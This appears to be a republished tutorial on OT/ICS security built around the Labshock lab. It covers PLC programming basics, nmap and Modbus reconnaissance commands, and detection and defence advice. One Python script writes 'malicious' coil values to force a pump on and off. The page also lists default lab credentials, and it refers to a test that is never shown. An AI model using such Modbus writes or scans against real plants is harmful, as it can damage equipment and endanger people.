Automation Anatomy: Why OT Security Fails Without PLC Programming Fundamentals + Video


Introduction:

Operational Technology (OT) security is fundamentally different from traditional IT security. While IT security professionals focus on networks, endpoints, and data, OT security requires deep understanding of physical processes, control logic, and the intricate chain of events that transforms a sensor reading into a physical action. Zakhar Bernhardt, Founder & CEO of Labshock Security and Architect at Primion, emphasizes a critical truth: most practitioners start from security and pentesting, but in OT this approach is insufficient because the Programmable Logic Controller (PLC) is only one part of a complex system where signals flow from physical processes through PLC memory, cyclic scans, HMI tags, and outputs that move real equipment. Before you can secure an industrial control system, you must first understand what you are controlling.

Learning Objectives:

  • Understand the complete automation anatomy and the role of each component in the OT chain
  • Master PLC programming fundamentals across Ladder Logic, Structured Text, and Function Blocks
  • Learn to set up a virtual OT security lab using Labshock for hands-on testing and validation

You Should Know:

1. Understanding the Automation Anatomy: The OT Chain

Before writing a single line of PLC logic, security professionals must comprehend the complete data flow that governs industrial processes. The automation anatomy consists of several interconnected layers: sensors capture physical process data, the PLC reads this data through its memory during a cyclic scan, logic executes and changes state, outputs drive physical equipment, the HMI displays results to operators, and the network carries all this traffic. Security teams typically only see the network traffic at the end of this chain, missing critical context about what happened before.

Step-by-Step Guide to Mapping an OT Environment:

  1. Identify Physical Processes: Document every sensor, actuator, motor, and valve in the facility. Understand what each device measures or controls.
  2. Map Data Flow: Trace how data moves from field devices to PLC inputs, through logic execution, to outputs and HMI displays.
  3. Analyze the PLC Scan Cycle: Understand that PLCs execute logic cyclically—reading inputs, executing code, and writing outputs in a continuous loop. This scan time directly impacts system behavior and security.
  4. Document Network Architecture: Identify all OT network segments, including fieldbus networks (e.g., Modbus, Profibus) and supervisory networks (e.g., Ethernet/IP).
  5. Create an Asset Inventory: List all PLCs, HMIs, engineering workstations, and network devices with their IP addresses, firmware versions, and communication protocols.

2. Setting Up Your OT Security Lab with Labshock

Labshock is a free, Docker-based OT/ICS cybersecurity lab environment that mimics real industrial networks, allowing security professionals to analyze protocols, simulate attacks, and test defensive strategies in a secure virtualized setting. It provides a complete stack including PLC, SCADA/HMI, IDS, and pentest workstations.

Step-by-Step Installation Guide (Ubuntu/Docker):

  1. Install Docker on Ubuntu

```bash
#!/bin/bash
set -e

# Uninstall old Docker versions
for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do
  sudo apt-get remove -y "$pkg" || true
done

# Prepare system for Docker repository
sudo apt-get update
sudo apt-get install -y ca-certificates curl gnupg lsb-release

# Add Docker's official GPG key
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo tee /etc/apt/keyrings/docker.asc > /dev/null
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add Docker repository
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
```

  2. Clone and Launch Labshock

```bash
git clone https://github.com/zakharb/labshock.git
cd labshock/labshock
# docker-compose-plugin installs Compose v2 as the "docker compose" subcommand,
# not the legacy "docker-compose" binary removed in step 1
docker compose build
docker compose up -d
```

Access the Labshock Portal:

  • Portal: http://localhost — landing page and documentation
  • OpenPLC: http://localhost:8080 — credentials: openplc/openplc, IEC 61131-3 runtime
  • FUXA HMI: http://localhost:1881 — web-based SCADA/HMI interface
  • EWS (Kali): http://localhost:5911/vnc.html — engineering workstation with full IDE
  • Pentest Station: `ssh pentest@localhost -p 2222` (password: pentest) — Nmap, Metasploit, Modbus-tk
  • IDS (Snort): http://localhost:1443 — live OT protocol decoding

Network Topology:

  • L2 Network (192.168.2.0/24): Field layer with PLC traffic
  • L3 Network (192.168.3.0/24): Supervisory layer with SCADA, EWS, IDS, and Collector

3. PLC Programming Fundamentals: Ladder Logic, Structured Text, and Function Blocks

PLC programming follows the IEC 61131-3 standard, which defines multiple languages: Ladder Diagram (LD), Function Block Diagram (FBD), and Structured Text (ST). Each language serves different purposes—Ladder Diagram resembles electrical schematics and is widely used in North America, Structured Text resembles Pascal or C and is common in Europe, while Function Block Diagram connects code blocks like wiring components.

“Hello World” Ladder Logic Program:

A basic “Hello World” in PLC programming typically involves controlling an output based on an input condition. Here’s how to create a simple start/stop circuit in Ladder Logic:

```text
       Start PB       Stop PB (NC)       Motor Output
|-------[ ]------+-------[/]-----------------( )--------|
|                |
|     Motor      |
|-------[ ]------+
```

The Stop pushbutton is drawn as a normally-closed contact ([/]), so the rung conducts until it is pressed.

This rung implements a seal-in circuit where:

  • Pressing the Start pushbutton energizes the Motor output
  • The Motor contact seals (latches) the circuit, keeping the output energized
  • Pressing the Stop pushbutton breaks the circuit, de-energizing the output

Structured Text Equivalent:

```iecst
(* Seal-in start/stop: Motor keeps its previous state when neither button is pressed *)
IF Start_PB AND NOT Stop_PB THEN
    Motor := TRUE;
ELSIF Stop_PB THEN
    Motor := FALSE;
END_IF;
```

Function Block Diagram Example:

A Function Block for a simple timer might look like:

```text
                  +-------+
Motor_Running ----|IN    Q|---- Delay_Complete
T#5s -------------|PT   ET|---- Elapsed_Time
                  +-------+
```

IN starts the on-delay timer while Motor_Running is TRUE; once the preset time PT (5 s, written T#5s in IEC 61131-3) has elapsed, Q becomes TRUE and ET reports the elapsed time.
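As an added example (not from the original post or from Labshock), the Python script below simulates a PLC scan cycle running the seal-in rung and the TON block above: inputs are latched once per scan, so a button press shorter than the scan time is never seen by the logic. The 100 ms scan time, the input timeline and the 5 s preset are constructed assumptions.

```python
from dataclasses import dataclass, field

SCAN_MS = 100  # assumed scan time for the demo; real PLCs are often 1-20 ms


@dataclass
class TON:
    """IEC 61131-3 on-delay timer: Q is TRUE once IN has stayed TRUE for PT."""
    pt_ms: int
    et_ms: int = 0
    q: bool = False

    def run(self, in_: bool, dt_ms: int) -> bool:
        self.et_ms = min(self.et_ms + dt_ms, self.pt_ms) if in_ else 0
        self.q = bool(in_ and self.et_ms >= self.pt_ms)
        return self.q


@dataclass
class PLC:
    """Process image for the page's seal-in rung plus a TON driven by Motor."""
    motor: bool = False
    timer: TON = field(default_factory=lambda: TON(pt_ms=5000))  # PT = T#5s

    def scan(self, start_pb: bool, stop_pb: bool) -> dict:
        # Inputs were latched at the start of the scan (the arguments); the logic
        # runs top to bottom; outputs are written once at the end of the scan.
        if start_pb and not stop_pb:
            self.motor = True       # Start energizes Motor, which then seals itself in
        elif stop_pb:
            self.motor = False      # Stop breaks the rung
        delay_complete = self.timer.run(self.motor, SCAN_MS)
        return {"Motor": self.motor, "Delay_Complete": delay_complete,
                "Elapsed_Time": self.timer.et_ms}


def sample_inputs(presses, n_scans):
    """Latch Start_PB / Stop_PB at each scan boundary t = k * SCAN_MS.
    presses: constructed list of (input_name, t_on_ms, t_off_ms)."""
    def pressed(name, t):
        return any(n == name and on <= t < off for n, on, off in presses)
    return [(pressed("Start_PB", k * SCAN_MS), pressed("Stop_PB", k * SCAN_MS))
            for k in range(n_scans)]


def run_plc(presses, n_scans):
    """Run n_scans scans on a fresh PLC and return the output image of each scan."""
    plc = PLC()
    return [plc.scan(start, stop) for start, stop in sample_inputs(presses, n_scans)]
```

The second call in the test below presses Start for 60 ms between two scan boundaries, and the motor never starts, which is why scan time matters when reasoning about what a PLC actually observed.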

4. Reconnaissance and Network Mapping in OT Environments

Before any security testing, you must understand the network topology and identify all assets. Labshock provides a realistic environment for practicing OT reconnaissance.

Network Scanning Commands (from Pentest Station):

```bash
# ARP and Ping Sweep of Supervisory Network (L3)
sudo nmap -sn -PR 192.168.3.0/24 -oG l3.gnmap

# Sweep the Field Network (L2)
sudo nmap -sn -PR 192.168.2.0/24 -oG l2.gnmap

# Port Scan for Modbus (TCP/502) and other OT protocols
sudo nmap -p 502,44818,2222,8080,1881,1443,2443 192.168.2.0/24
```

Modbus Enumeration:

```bash
# Discover Modbus devices
nmap --script modbus-discover -p 502 192.168.2.0/24

# Read Modbus coil values: -t 0 selects the coil data type (the default is holding
# registers) and -r is a 1-based start reference, so -r 1 -c 10 reads coils 0-9
modpoll -m tcp -a 1 -t 0 -r 1 -c 10 192.168.2.10
```

5. Attacking and Defending PLCs: Practical Security Testing

The primary focus of OT security testing is attacking the PLC, which manages and controls process data, and the SCADA system, which presents this data in real time. By modifying data within the PLC, it is possible to affect operational processes.

Simulating a Modbus Attack (Python Script):

```python
from pymodbus.client import ModbusTcpClient
import time

# Connect to the PLC on the field network (Modbus/TCP, port 502)
client = ModbusTcpClient('192.168.2.10', port=502)
if not client.connect():
    raise SystemExit("could not connect to PLC")

# Read current coil values (coils 0-9)
response = client.read_coils(0, count=10)
if response.isError():
    raise SystemExit(f"Modbus error: {response}")
print(f"Current coil values: {response.bits[:10]}")

# Write malicious value to coil (e.g., override pump control)
client.write_coil(0, True)   # Force pump ON
time.sleep(2)
client.write_coil(0, False)  # Force pump OFF

client.close()
```

IDS Monitoring:

Labshock includes an IDS service that decodes OT protocols and generates alerts. Monitor IDS logs at http://localhost:1443 to see how attacks are detected.

Defensive Measures:

  • Network Segmentation: Isolate OT networks from IT networks
  • Modbus Security: Use Modbus with authentication or TLS where possible
  • PLC Hardening: Change default credentials, disable unused services, enable logging
  • Continuous Monitoring: Deploy OT-specific IDS/IPS to detect anomalous traffic patterns
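The IDS alerting described above, and the "abnormal Modbus read/write patterns" SIEM use case, can be approximated with a small decoder. The following Python is an added example (not Labshock's IDS and not code from the original post) that parses Modbus/TCP frames and flags write function codes from hosts outside an allow list. The frames, the 192.168.3.x source addresses and the allow list are constructed assumptions; only the PLC address 192.168.2.10 comes from the page.

```python
import struct
from typing import Optional

PLC_IP = "192.168.2.10"                     # PLC address from the page
ALLOWED_WRITERS = {"192.168.3.20"}          # assumed HMI/EWS allowed to write

WRITE_FC = {5: "Write Single Coil", 6: "Write Single Register",
            15: "Write Multiple Coils", 16: "Write Multiple Registers"}


def parse_mbap(frame: bytes) -> dict:
    """Split a Modbus/TCP request into MBAP header fields, function code and address."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"not Modbus/TCP (protocol id {pid})")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    addr = struct.unpack(">H", frame[8:10])[0] if len(frame) >= 10 else None
    return {"tid": tid, "unit": uid, "fc": frame[7], "addr": addr}


def inspect(src_ip: str, dst_ip: str, frame: bytes) -> Optional[dict]:
    """Alert on any write function code sent to the PLC by a host not on the allow list."""
    if dst_ip != PLC_IP:
        return None
    req = parse_mbap(frame)
    if req["fc"] in WRITE_FC and src_ip not in ALLOWED_WRITERS:
        return {"src": src_ip, "unit": req["unit"], "fc": req["fc"],
                "name": WRITE_FC[req["fc"]], "addr": req["addr"]}
    return None


def build_request(tid: int, unit: int, fc: int, addr: int, value: int) -> bytes:
    """Constructed helper: MBAP header + 4-byte-data PDU (FC 1-6 all share this shape)."""
    pdu = struct.pack(">BHH", fc, addr, value)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


# Constructed traffic: the HMI polls 10 coils, then an unlisted host forces coil 0
# ON (0xFF00) and OFF (0x0000), the same Write Single Coil the script above sends.
SAMPLE = [
    ("192.168.3.20", PLC_IP, build_request(1, 1, 1, 0, 10)),
    ("192.168.3.99", PLC_IP, build_request(2, 1, 5, 0, 0xFF00)),
    ("192.168.3.99", PLC_IP, build_request(3, 1, 5, 0, 0x0000)),
]


def alerts(traffic=SAMPLE) -> list:
    """Run the check over a (src, dst, frame) list and return the alerts raised."""
    return [a for a in (inspect(s, d, f) for s, d, f in traffic) if a]
```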

6. The Convergence of Physical and OT Security

Zakhar Bernhardt draws a powerful parallel between physical security and OT security: “Physical security watches doors, access, movement. OT security watches PLCs, traffic, signals. Same goal: keep plant safe, keep operations running”. Yet these teams often operate in silos with no shared picture or alerts. Primion is working to bridge this gap by building converged security for European sites with real systems and real impact.

Why Convergence Matters:

  • Physical security breaches can lead to OT compromises (e.g., unauthorized physical access to control rooms)
  • OT attacks can have physical consequences (e.g., manipulated PLC logic causing equipment damage)
  • Unified monitoring provides complete situational awareness

Implementation Steps:

  1. Unify Security Teams: Create cross-functional teams covering both physical and OT security
  2. Share Alerts: Integrate physical access control systems with OT monitoring platforms
  3. Conduct Joint Exercises: Run tabletop exercises that simulate combined physical-OT attack scenarios
  4. Adopt Security by Design: Primion’s approach emphasizes encrypted communication, tamper-proof firmware, and regular updates

7. OT SIEM and Log Collection

Effective OT security requires collecting and analyzing logs from PLCs, HMIs, IDS, and other components. Labshock includes a Collector service that aggregates logs and packets.

Setting Up Log Collection:

  • Collector UI: http://localhost:2443
  • Log forwarding to SIEM (e.g., Splunk): Labshock provides integration with Splunk for OT SIEM training

Key Logs to Collect:

  • PLC logic changes and program uploads/downloads
  • HMI user login attempts and tag modifications
  • IDS alerts for suspicious protocol anomalies
  • Network device syslogs and authentication events

OT SIEM Use Cases:

  • Unauthorized PLC program modifications
  • Repeated failed login attempts to HMIs or engineering workstations
  • Abnormal Modbus read/write patterns
  • Communication with unknown IP addresses

What Undercode Say:

  • Key Takeaway 1: OT security is fundamentally about understanding physical processes and control logic, not just network traffic. Without PLC programming knowledge, security testing is incomplete and potentially dangerous.

  • Key Takeaway 2: Hands-on practice in realistic environments like Labshock is essential for developing OT security skills. You cannot secure what you do not understand, and you cannot validate security through documentation alone—you must run, break, fix, and validate systems in controlled settings.

Analysis:

The OT security landscape is rapidly evolving as industrial systems become increasingly connected. Traditional IT security approaches are insufficient because they lack context about physical processes and control behavior. Zakhar Bernhardt’s emphasis on “automation anatomy” highlights a critical gap in current OT security training: most programs focus on pentesting tools and network analysis without teaching the fundamentals of how industrial systems actually work. The Labshock platform addresses this by providing a complete, free, hands-on environment where practitioners can learn both PLC programming and security testing in a realistic context. The convergence of physical and OT security, as championed by Primion, represents the next frontier—recognizing that physical breaches can enable OT attacks and that unified visibility is essential for comprehensive protection. As IoT devices proliferate in industrial environments, the attack surface expands dramatically, making Security by Design principles more critical than ever.

Prediction:

+1 The democratization of OT security training through platforms like Labshock will significantly reduce the skills gap in industrial cybersecurity over the next 3-5 years, enabling more organizations to build competent internal security teams.

+1 The convergence of physical and OT security will become a standard practice in critical infrastructure, driven by regulatory requirements and the recognition that siloed security approaches are no longer viable.

-1 The proliferation of IoT devices in OT environments will continue to expand the attack surface faster than security measures can adapt, leading to an increase in successful attacks against industrial systems in the short term.

+1 AI-powered OT security analytics will mature, enabling real-time anomaly detection and automated response to threats, but will require substantial investment in data collection and model training.

-1 Organizations that fail to invest in hands-on OT security training and testing will remain vulnerable to sophisticated attacks that exploit control logic vulnerabilities, not just network misconfigurations.

Reported By: Zakharb Labshock – Hackers Feeds